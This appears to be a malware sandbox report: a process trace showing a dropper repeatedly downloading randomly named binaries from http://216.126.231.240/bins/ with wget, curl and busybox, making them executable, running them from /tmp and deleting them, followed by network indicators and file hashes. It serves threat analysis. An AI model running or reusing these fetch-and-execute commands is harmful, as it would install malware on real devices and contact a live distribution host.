/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/chmod

[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0

[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/rm

[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/chmod

[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB

[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/rm

[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/wget

[wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/chmod

[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR

[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/rm

[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/chmod

[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5

[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/rm

[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/chmod

[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey

[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/rm

[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/wget

[wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/chmod

[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O

[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/rm

[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/wget

[wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/chmod

[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5

[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/rm

[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/chmod

[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0

[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/rm

[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/chmod

[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR

[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/rm

[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/chmod

[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5

[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/rm

[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/wget

[wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/chmod

[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB

[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/rm

[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/wget

[wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/chmod

[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O

[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/rm

[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/wget

[wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/chmod

[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5

[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/rm

[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/chmod

[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey

[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/rm

[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97